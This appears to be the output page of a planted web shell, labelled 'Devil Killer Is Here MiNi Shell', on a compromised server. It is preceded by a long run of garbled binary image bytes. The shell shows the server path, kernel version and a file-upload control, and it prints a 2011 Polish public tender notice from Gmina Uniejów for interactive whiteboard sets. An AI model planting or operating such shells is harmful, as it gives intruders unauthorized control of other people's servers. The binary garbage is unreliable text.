JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110419/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110419/84038-N-2011.html

<p class="kh_header"><b>Uniejów: dostawa zestawów interaktywnych w ilości sztuk 4 : tablica interaktywna z projektorem multimedialnym o ultrakrótkoogniskowej z zestawem nagłaśniającym i notebookiem wraz z montażem całego systemu i szkoleniem nauczycieli w wymiarze 2 godzin.</b><br>
<b>Numer ogłoszenia: 84038 - 2011; data zamieszczenia: 19.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Uniejów , ul. Błogosławionego Bogumiła 13, 99-210 Uniejów, woj. łódzkie, tel. 063 2888192, faks 063 2888192.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www..uniejow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa zestawów interaktywnych w ilości sztuk 4 : tablica interaktywna z projektorem multimedialnym o ultrakrótkoogniskowej z zestawem nagłaśniającym i notebookiem wraz z montażem całego systemu i szkoleniem nauczycieli w wymiarze 2 godzin..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa zestawów interaktywnych w ilości sztuk 4 : tablica interaktywna  z projektorem multimedialnym o ultrakrótkoogniskowej z zestawem nagłaśniającym i notebookiem wraz z montażem całego systemu i szkoleniem nauczycieli w wymiarze 2 godzin.	Tablica interaktywna 

SPECYFIKACJA TECHNICZNA:

Technologia odczytu położenia pisaka	Elektromagnetyczna pasywna (bez emisji pola elektromagnetycznego przez powierzchnię tablicy) 
Powierzchnia tablicy 	Twarda, przeznaczona do projekcji i rysowania 
Rozdzielczość sprzętowa 	rozdzielczość wewnętrzna: 4096 punktów (linii) na cal rozdzielczość wyjściowa: 1000 linii na cal (39,4 linii na mm) 
Wymiary obszaru roboczego	1181 mm x 1575 mm
Przekątna obszaru roboczego	77,5 cala (197 cm)
Format obszaru roboczego	4:3
Wymiary zewnętrzne tablicy	Max.1340 mm x 1740 mm
Maks. obsługiwane rozdzielczości 	46 500 x 62 000 pikseli 
Prędkość odczytu współrzędnych 	do 150 współrzędnych na sekundę, 250 cali na sekundę 
Czułość zbliżeniowa tablicy 	do 0,4 cala (9,76 mm) 
Komunikacja z komputerem 	Przewodowa: poprzez port RS-232C albo USB (oba porty zamontowane bezpośrednio w tablicy), bez konieczności używania adapterów i specjalnych kabli
Bezprzewodowa (nie dostarczana standardowo): Bluetooth oraz radiowa RF 2,4GHz (moduły produkowane przez producenta tablicy) 
Oprogramowanie i sterowniki 	Win 98 Me NT 2000 XP Vista Windows 7 (32 i 64 bit)
Mac OS X (w tym Snow Leopard)
Linux 
oprogramowanie do każdego z tych systemów w języku polskim
Zasilanie tablicy 	Tablica zasilana bezpośrednio poprzez port USB, zasilacz jest konieczny tylko w przypadku korzystania z komunikacji bezprzewodowej oraz do zasilania ładowarki do pisaków 
Zasilanie pisaków 	pisak elektroniczny zasilany przez wbudowany akumulator. Ładowanie pisaków za pomocą ładowarki znajdującej się w wyposażeniu standardowym tablicy interaktywnej bez konieczności wyjmowania akumulatora z pisaka elektronicznego (przez złącze zainstalowane w pisaku)
Czas pracy pisaków pomiędzy ładowaniami ok. 40 godz.
Możliwość wyjęcia akumulatora przy utylizacji pisaka 
Obsługa tablicy	Za pomocą załączonych pisaków, pełna emulacja myszki komputerowej przy tablicy. Tablica powinna zapewniać możliwość pracy 2 osób jednocześnie
Sprzętowa emulacja myszki 	Pisaki wyposażone są w przyciski realizujące sprzętowo funkcje: lewy i prawy klawisz, podwójne kliknięcie, drag&drop) bez programowej emulacji i konieczności naciskania dodatkowych przycisków na tablicy 
Programowalne przyciski bezpośrednio na tablicy 	18 przycisków po obu stronach tablicy z najważniejszymi funkcjami, w tym 3 przyciski dowolnie programowalne przez użytkownika. Pasek skrótów połączony trwale z tablicą.
Współpraca z innymi urządzeniami w ramach większego systemu tego samego producenta 	Bezpośrednia współpraca z bezprzewodowymi tabletami (jednoczesna praca do 7 tabletów wspólnie z tablicą) oraz systemu pilotów do testów tego samego producenta. 
Standardowe wyposażenie	2 pisaki interaktywne, ładowarka do pisaków, mocowana i  zasilana bezpośrednio z tablicy, kable USB (5m) oraz RS232C (8m), mocowanie ścienne do tablicy, zasilacz uniwersalny do tablicy, oprogramowanie
Gwarancja 	3 lata tablica (elektronika i powierzchnia tablicy) oraz 1 rok na akcesoria. Po bezpłatnej rejestracji dodatkowe 2 lata gwarancji na elektronikę i powierzchnię 


Specyfikacja oprogramowanie do tablicy 

Pełna paleta narzędzi do tworzenia elektronicznych adnotacji, takich jak: różnokolorowe pisaki, zakreślacze, pisaki wielokolorowe, pisaki obrazkowe, stemple
możliwość pisania po tablicy jednocześnie przez dwóch użytkowników w tym samym czasie, przy użyciu dwóch pisaków elektronicznych, na całej powierzchni tablicy oraz na osobnych, wydzielonych obszarach tablicy
Możliwość jednoczesnego pisania przez maks. 9 użytkowników przy zastosowaniu kilku tablic interaktywnych podłączonych do jednego komputera lub wykorzystując współpracujące z tablicą bezprzewodowe tablety tego samego producenta 
Zintegrowany tryb współpracy z aplikacjami Microsoft Office (Power Point, Excel, Word) umożliwiający wstawianie adnotacji bezpośrednio do tych aplikacji
Możliwość pracy na sześciu warstwach z możliwością ukrywania warstw, zmiany ich kolejności , nadawania im tytułów i edytowania obiektów tylko na aktywnych warstwach
Ustawiane właściwości, nadawanie nazwy i dołączanie notatek dla każdej strony indywidualnie z możliwością ich drukowania
Możliwość wyświetlenia pod kursorem identyfikatora aktualnie pracującego narzędzia (zarówno pisaki tablicy jak i inne współpracujące urządzenia, np. tablety lub inne tablice)
Wstawianie ponad 40 efektów przejść pomiędzy stronami z wewnętrznej bazy programu
Zmiana orientacji kursora (dla leworęcznych i praworęcznych)
Możliwość wstawienia pustej strony w dowolnym kolorze, strony z dowolnym tłem graficznym, kalendarzem oraz strony z gradientem (z wykorzystaniem do gradientu dwóch lub czterech kolorów)
Możliwość wstawienia strony w linie lub kratkę z definiowaniem wielkości odstępów pomiędzy liniami, koloru, rodzaju (ciągła, przerywana) i grubości linii
Funkcja automatycznego wygładzania krzywych 
Możliwość wyświetlania i ukrywania na stronie, definiowanej przez użytkownika siatki z możliwością przyciągania do niej wstawianych obiektów
Tymczasowe blokowanie obiektów i kopiowanie poprzez przeciąganie obiektów (kopiarka obiektów)
Pięć programowalnych przez użytkownika przycisków paska , 
oprogramowania dostarczonego z tablicą
Definiowanie łączy do dowolnych zewnętrznych plików, stron internetowych, dźwięków, filmów dla dowolnych obiektów na stronie
Rozpoznawanie i konwersja tekstu ręcznego i rysowanych odręcznie podstawowych figur geometrycznych, w przypadku tekstu bez konieczności otwierania dodatkowego pola tekstowego, wyrównywanie tekstu z rozpoznaniem polskich znaków fonetycznych z każdego miejsca na powierzchni tablicy.
Interaktywne narzędzia do geometrii - linijka, ekierka, kątomierz, cyrkiel umożliwiający zakreślenie pełnego koła oraz łuku (z podaniem kąta wycinka). Narzędzia z możliwością dostosowania ich wielkości do wymagań prezentacji. Możliwość użycia tych narzędzi  jako nakładki na dowolnej aplikacji
Pełna edycja obiektów: obrót, przesuwanie, zmiana rozmiarów, ustawianie kolejności czy grupowanie i rozgrupowanie obiektów oraz narzędzia wypełnienia
Wbudowana i w pełni edytowalna Galeria, zawierająca ponad 500 MB gotowych do wykorzystania i dostarczanych razem z tablicą elementów
Możliwość dodawania do Galerii zewnętrznych elementów graficznych, dźwięków, filmów, obiektów Flash, dokumentów PDF i adresów stron WWW
Wbudowana wyszukiwarka elementów w Galerii, uwzględniająca wyszukiwanie wg nazw, słów kluczowych, typu mediów (m.in. dźwięk, film, flash, obrazek, tło)
Możliwość dodawania do galerii pojedynczych obiektów oraz całych katalogów z obiektami poprzez przeciągnięcie ich bezpośrednio z eksploratora plików systemu. Możliwość dodawania elementów graficznych do galerii poprzez ich przeciągnięcie bezpośrednio ze stron internetowych
Archiwizacja w formatach: PowerPoint PPT, plików graficznych (JPG, PNG, GIF, TIFF), plików PDF, HTML,  AVI (z rejestracją dźwięku stereo)
Pełna współpraca z programami obsługującymi pocztę elektroniczną
Wstawianie tekstu za pomocą klawiatury ekranowej lub modułu rozpoznawania tekstu i możliwość automatycznego podzielenia  wstawionego  jako jeden obiekt tekstu na wyrazy będące osobnymi obiektami
Tworzenie adnotacji na ruchomym i zatrzymanym obrazie
Inteligentne zrzuty ekranu (zaznaczenie, cały ekran, dostępne okna aplikacji lub dowolny kształt)
Ujawnianie treści przy zastosowaniu kurtyny ekranowej z możliwością regulacji wielkości w obu kierunkach jednocześnie, edycją koloru kurtyny i jej położenia na ekranie
Wykorzystanie elektronicznego reflektora (latarki) z możliwością regulacji przezroczystości pozostałej nieodsłoniętej części ekranu, wyboru jednego z 10 możliwych kształtów reflektora oraz regulacją jego wielkości
Pełna konfiguracja paska narzędziowego - możliwość  stworzenia odrębnego profilu dla każdego użytkownika. Przełączanie pomiędzy profilami bez konieczności wyłączania oprogramowania
automatyczne zapisywanie kopii bezpieczeństwa tworzonego pliku o wybrany interwał czasu oraz odtwarzanie dokumentu po jego niekontrolowanym zamknięciu w sytuacji krytycznej wywołanej niestabilnością systemu.
Możliwość wyboru spośród 48 dostępnych języków oprogramowania bez konieczności wyłączania oprogramowania przy zmianie języka
Pełna lokalizacja w języku polskim.  (program, pomoc kontekstowa i moduł pomocy do programu, uruchamiany bezpośrednio z menu programu tablicy a nie zewnętrznie). 
Rozpoznawanie ręcznie pisanego tekstu w jednym z 86 języków (w tym język POLSKI) z wbudowanymi słownikami (bez potrzeby zastosowania zewnętrznego oprogramowania) i zmianą wykorzystywanych w danym momencie słowników bez konieczności wyłączania oprogramowania.
Wbudowane funkcje obsługi innych urządzeń takich jak bezprzewodowe tablety i piloty do testów tego samego producenta oraz urządzenia przechwytywania obrazu (np. wizualizery)
Możliwość zmiany położenia na dysku katalogów z przechowywanymi danymi programu (m.in. folder bazy danych galerii użytkownika, stemple i obrazki użytkownika, pliki lekcji, i eksportów i nagrań użytkownika)
Możliwość zmiany wielkości i kształtu ikon w menu narzędziowym programu


 Notebook
SPECYFIKACJA TECHNICZNA:

Ekran - matryca o przekątnej min. 15,6,  rozdzielczość 1366 x 768, 
Procesor -  min.: dwurdzeniowy dedykowany do pracy w komputerach przenośnych, taktowny zegarem co  najmniej 2,4 GHz, z pamięcią podręczną trzeciego poziomu o wielkości co najmniej 3 MB lub procesor równoważny wydajnościowo według wyniku testów przeprowadzonych przez Oferenta. Zaoferowany procesor musi uzyskiwać jednocześnie w teście Passmark CPU Mark wynik min.: 2400 punktów.
Pamięć RAM - 4GB 1066 MHz DDR3 z możliwością rozbudowy do 8 GB
Dysk twardy - min.: 3200 GB Serial ATA, 5400 obr.min
Karta graficzna  - dedykowana o pojemności pamięci min. 512 MB
Audio - karta dźwiękowa zintegrowana, wbudowane głośniki stereo
Karta sieciowa - wbudowana karta sieciowa przewodowa 10 100 1000 Mbps Gigabit Ethernet
Łączność bezprzewodowa - wbudowana karta sieciowa bezprzewodowa WiFi zgodna z IEEE 802.11 b g n
Porty złącza - 3x USB 2.0, złącze słuchawek, złącze mikrofonu, 1x HDMI, RJ-45, wyjście na monitor zewnętrzny VGA, czytnik kart pamięci z obsługą formatów SD, miniSD microSD, SDHC, kamera internetowa min. 0,3 Mpx (VGA)
Napęd optyczny - nagrywarka DVD Super Multi z obsługą Double Layer
Bateria - litowo-jonowa, 6 ogniwowa
System operacyjny - Microsoft Windows 7 Home lub Professional PL (64bit)
Inne - torba dostosowana rozmiarem do wielkości notebooka, mysz optyczna, oprogramowanie biurowe Office 2010, TouchPad z min. Dwoma przyciskami, klawiatura w układzie QWERTY,  gwarancja min. 2-letnia producenta.

Projektor  
SPECYFIKACJA TECHNICZNA:

Technologia projekcji DLP
Rozdzielczość podstawowa XGA (1024 x 768) 
Możliwe rozdzielczości VGA (640 x 480) do WUXGA (1920 x 1200)
Jasność min 2500 ANSI Lumenów 
Kontrast min 3000:1 (Full on  Full off) 
Wielkość obrazu 60  do 300 
Wskaźnik projekcji 0.3:1 (obraz o przekątnej 78 w formacie 4:3 rzucany  z  48cm) 
Korekta trapezu - pionowo? 15 Stopni 
Długość życia lampy 230W min 3500  5000 godzin (Tryb Regular.  Tryb Ekonomiczny) 
Głośność pracy max  33  27 dB (Tryb Zwykłyl   Tryb Ekonomiczny)

Wejścia
PC:
Analog RGB: D-sub 15 pin x 2
USB type A x 1 (USB reader)
USB type mini-B x 1 (USB display)
A V:
Component Video: D-sub 15 pin x 2 (shared with analog RGB connector)
S-Video: Mini Din 4 pin x 1
Composite Video: RCA x 1
Stereo Mini Jack x 1
Microphone: Stereo Mini Jack x 1
Audio L R: RCA x 2

Wyjścia
PC:
Monitor Out: D-sub 15 pin x 1
Audio:
Audio Out : Stereo Mini Jack x 1
Głośniki: 10W x 2

Tryby pracy min. 
Dynamiczny
sRGB 
Prezentacji
Tryb Kina, Tryb użytkownika 1, Tryb użytkownika 2

Akcesoria standardowe 
Instrukcja Szybkiego Uruchomienia 
Instrukcja obsługi na płycie CD 
Pilot baterie 
Kabel VGA 
Kabel zasilający 

Wraz z projektorem należy dostarczyć uchwyt dedykowany do projektora umożliwiający montaż  projektora we właściwej odległości nad i od tablicy interaktywnej. Gwarancja:  
12 miesięcy lub 2000h na lampę (w zależności co pierwsze), na projektor 36 miesięcy.

Wizualizer

SPECYFIKACJA TECHNICZNA:

Rodzaj urządzenia: Kamera dokumentująca
Aparat fotograficzny:   Kolor
Rodzaj czujnika optycznego: CMOS - 1 3 - 2 miliony pikseli
Regulacja ostrości: Automatyczna
Obiektyw Iris: F 2,8
Interfejsy: USB
Zoom cyfrowy: 4 krotny
Waga: poniżej 1kg
Rotacja obrazu, zamrożenie obrazu cyfrowego, automatyczny balans bieli,
jeden kabel USB do zasilania i przesyłania obrazu.

Głośniki

Moc nominalna: 40 W
Moc max: 100 W
Impedancja 8 ohm
Pasmo przenoszenia: 80 - 20 000 Hz
Efektywność:  84 dB
Zalecana moc wzmacniacza: 10 100 W
Konstrukcja dwudrożna, compact
Głośniki w zabudowie: MDF

Wzmacniacz

Moc 2 x 20W RMS, Impedancja 8
Możliwość pracy przy 4  jako źródło dźwięku dla mniejszych głośników
Dwa niezależne wejścia stereo, podłączone bezpośrednio do tylnej części modułu,
Jedno z nich wyprowadzone na panel przedni - zdublowane
Zasilacz zewnętrzny - możliwość montażu w specjalnej puszce z maskownicą
Pilot zdalnego sterowania
Wyświetlacz LED - ukazujący poziom głośności i wybór kanału
Konstrukcja modułowa umożliwiająca pełną integrację z innymi elementami zintegrowanego systemu przyłączy



Instalacja i montaż

Wysoki standard wykonania instalacji, wszystkie przewody poprowadzone w korytkach kablowych przystosowanych do tego celu, zakończenie instalacji z zastosowaniem zintegrowanego systemu przyłączy technicznych: Moduł VGA + MiniJack, Moduł USB-b, puszka instalacyjna musi być przystosowana do montażu wzmacniacza. W celu wykonania kompleksowej instalacji wykonawca jest zobowiązany dostarczyć wszystkie konieczne przewody, tj.: Przewód VGA, Przewody głośnikowe, Przewód USB, Doprowadzenie zasilania do odpowiednich punktów związanych z instalacją, Przewody sygnałowe audio.

Całość oferowanego przedmiotu zamówienia musi być fabrycznie nowa i kompletna.
Wszelkie nazwy produktów, urządzeń i materiałów, zostały użyte w opisie przedmiotu zamówienia służą jedynie ustaleniu pożądanego standardu i określeniu właściwości oraz wymogów technicznych. Zamawiający informuje , ze dopuszcza składanie ofert w urządzenia równoważne tj. przedmiot zamówienia różnych producentów, jednak pod warunkiem że spełni on wymagania techniczne określone przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.32.20.00-6, 32.32.12.00-2, 30.20.00.00-1, 30.23.72.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymaga się wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu . dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę  w niniejszym postępowaniu metodą warunku granicznego-spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu . dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę  w niniejszym postępowaniu metodą warunku granicznego-spełnia nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy -wypełniony i podpisany  przez wykonawcę. 
Wzór umowy - parafowany przez wykonawcę. 
Dokumenty potwierdzające  posiadanie  uprawnień pełnomocnictw osób składających  ofertę , o ile nie wynika to z przedstawionych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
